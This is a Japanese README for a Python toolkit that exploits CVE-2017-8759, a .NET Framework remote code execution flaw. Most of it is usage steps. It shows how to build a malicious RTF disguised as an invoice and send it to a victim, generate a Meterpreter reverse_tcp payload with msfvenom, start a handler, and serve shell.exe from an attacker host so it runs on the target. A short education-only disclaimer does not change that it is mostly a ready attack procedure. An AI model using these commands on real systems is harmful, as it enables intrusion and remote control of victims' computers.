
CVE-2017-8759 Microsoft Word脆弱性悪用スクリプト
Exploit tool CVE-2017-8759 は、ペネトレーションテスターやセキュリティ研究者が Microsoft .NET Framework のリモートコード実行(RCE)を迅速かつ効果的にテストできる便利な Python スクリプトです。複雑な設定を必要とせずに、悪意のある RTF ファイルを生成し、Metasploit / Meterpreter / その他のペイロードを被害者に配信できます。
このプログラムは教育目的のみで使用してください。許可なく使用しないでください。通常の免責事項が適用されます。特に、私(bhdresh)は、これらのプログラムが提供する情報や機能を直接的または間接的に使用したことによって生じたいかなる損害についても責任を負いません。著者またはインターネットプロバイダーは、これらのプログラムまたはその派生物の内容や誤用について一切の責任を負いません。このプログラムを使用することにより、データ損失、システムクラッシュ、システム侵害など、これらのプログラムの使用によって生じたいかなる損害も bhdresh の責任ではないことを承諾したものとみなします。
最後に、これは個人の開発物です。その理念を尊重し、悪用しないでください。
スクリプトに以下の機能を追加しました。
- 悪意のある RTF ファイルの生成
- 生成された RTF ファイルのエクスプロイトモード
バージョン: Python バージョン 2.7.13
1) 悪意のある RTF ファイルを生成する
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (MSF ペイロードを使用する場合のオプション): Metasploit ペイロードを生成し、ハンドラを起動する
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) ローカルペイロードを配信するためにツールキットをエクスプロイトモードで起動する
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
This is a handy toolkit to exploit CVE-2017-8759 (Microsoft .NET Framework RCE)
Modes:
-M gen Generate Malicious file only
Generate malicious RTF/PPSX file:
-w <Filename.rtf> Name of malicious RTF file (Share this file with victim).
-u <http://attacker.com/test.txt> Path of remote txt file. Normally, this should be a domain or IP where this tool is running.
For example, http://attackerip.com/test.txt (This URL will be included in malicious RTF file and will be requested once victim will open malicious RTF file.
-M exp Start exploitation mode
Exploitation:
-p <TCP port:Default 80> Local port number.
-e <http://attacker.com/shell.exe> The path of an executable file / meterpreter shell / payload which needs to be executed on target.
-l </tmp/shell.exe> Specify local path of an executable file / meterpreter shell / payload.